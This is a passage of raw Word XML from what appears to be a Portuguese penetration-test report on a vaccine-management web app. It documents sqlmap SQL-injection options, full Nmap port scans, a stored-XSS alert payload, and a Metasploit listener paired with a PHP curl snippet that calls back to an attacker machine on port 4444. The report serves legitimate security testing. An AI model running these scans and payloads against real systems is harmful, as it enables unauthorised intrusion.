        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“./sqlmap.py” </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“-u” </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF1C9C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“--cookie” </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para especificar um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“--current -db” </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> “--l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">evel 5” </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para aumentar o nível da heurística utilizada</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> no escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001B2F09" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto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ind w:left="2124" w:firstLine="6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Esperava-se que a tela de Login não fosse vulnerável à injeção de SQL e consequentemente não fosse possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001B2F09" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto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  <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Passou no teste. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Embora</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09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tendo aumentado o nível da</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e por consequência não foi possível descobrir o no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>me do banco de dados utilizado pel</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001B2F09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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00945AD3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="Pargrafoda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993" w:hanging="284"/>
        <w:jc w:val="both"/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b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Iteração 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00945AD3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00945AD3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Análise do Servidor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Exploração via</w:t>
      </w:r>
      <w:r w:rsidRPr="00945AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>map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dia 24/04/16.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Duração: 1 hora.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8A79EE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  <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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8A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Após o problema de corrupção do sistema operacional do servidor de dados da aplicação, houve mudanças na arquitetura do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar a base de dados.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8A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Com essa migração alguns serviços adicionais precisaram ser abertos, isso possibilitou que algum serviço adicional não tenha sido fechado no término do processo. A atividade foi refeita para descobrir se algum serviço adicional foi deixado aberto.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Tentativa 1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Usar o Nmap para varrer as portas 1 a 65.535 do sistema usando o scan TCP.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>Comando utilizado: nmap -sV -p 1-65535 IP_do_servidor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27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“-sV” é utilizado para realizar o SYN e buscar a versão do software rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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“-p” indica quais portas a serem usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IP_do_servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> informa o IP onde está hospedada a aplicação.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84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484"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C65C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir as portas abertas TCP, os serviços que essas portas rodavam no momento do escaneamento.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484"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00892814" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="248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Resultado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste. A figura 14 mostra todas as portas escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="00EC5D2B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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4114165"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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5.jpe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4F40AA" w:rsidRDefault="00EC5D2B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Figura 15</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004F40AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Portas TCP escaneadas pelo Nmap.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 w:firstLine="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00751591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751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pptp</w:t>
      </w:r>
      <w:r w:rsidRPr="00751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Protocolo de Tunelamento Ponto a ponto.Utilizado para garantir segurança em redes wireless.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751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ms-wbt-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = serviço de gerenciamento de hosts do windows.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Tentativa 2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Usar o Nmap para varrer as portas 1 a 65.535 do sistema usando o scan de portas UDP.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>Comando utilizado: nmap -sU -p 1-65535 IP_do_servidor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28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“-sU” indica o uso do detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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“-p” indicará quais portas devem ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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IP_do_servidor informa o IP onde está hospedada a aplicação.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48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484"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir as portas abertas UDP, os serviços que essas portas rodavam no momento do escaneamento.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48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720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00892814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Resultado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste. A figura 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostra todas as portas escaneadas pelo Nmap.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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5467350" cy="3654425"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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6.jpe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Default="00EC5D2B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Figura 16</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004F40AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Portas UDP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="004F40AA" w:rsidRDefault="00EC5D2B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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="004F40AA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  <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.2 XSS – Cadastro L</w:t>
      </w:r>
      <w:r w:rsidRPr="004F40AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>otes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Vacinas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dia 23/04/16.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Duração: 1 hora e 10 minutos.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Objetivo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Descobrir se os campos da tela de Cadastro Lotes de Vacinas são vulneráveis ao ataque XSS Armazenado. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Foi esperado que a aplicação tratasse todos os dados inseridos nos campos para evitar que códigos maliciosos pudessem ser inseridos na base de dados.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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Tentativa 1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Inserir em um dos campos o seguinte código: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>&lt;script&gt; alert(“oi”);&lt;/script&gt; no campo Marca/Fabricante.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EE08B0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EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Caso a aplicação não realizasse um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dados deveriam produzir um pop-up com o texto “oi”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00EE08B0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Cs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não passou no teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. Foi constatado que a aplicação não está fazendo o tratamento adequado para a inserção de códigos mal intencionados nos campos da tela em questão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRDefault="00BC1742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BC1742" w:rsidRDefault="00BC1742" w:rsidP="00BC1742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lastRenderedPageBreak/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3998595"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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17.jpe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Default="00BC1742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Figura 17</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F248C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado teste XSS</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000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Tentativa 2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EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>A partir da máquina virtual que usa o Kali Linux, abrir uma conexão do Sistema de Vacinas fazendo uso de um listener da ferramenta Metasploit para acessar o sistema operacional que hospeda a aplicação.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Passos utilizados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2832"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1. Utilizar o Metasploit para abrir um listener na porta 444 da máquina virtual onde o Kali Linux está hospedado, usando o exploit disponível em Auxiliary/Multi/Handler;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00EE08B0" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2832"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Usar um comando GET de Javascript para abrir a conexão da máquina que hospeda o Sistema de Vacinas com a máquina virtual do Kali na porta indicada</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="cyan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EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">         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Comando a ser utilizado no XSS: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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$curl = curl_init('http://</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6E06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP_do_servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:4444');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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl_exec($curl);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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl_close($curl);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lastRenderedPageBreak/>
        <w:t>?&gt;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AE0F2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8A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Caso não haja o devido tratamento, o  listener do Metasploit aberto na porta 444 deve criar uma conexão entre a máquina que </w:t>
      </w:r>
      <w:r w:rsidR="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">acessa </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a aplicação no momento e a máquina onde está o Kali Linux. O esperado é que existisse algum mecanismo na aplicação para impedir a tentativa.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B67E48">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">         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</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
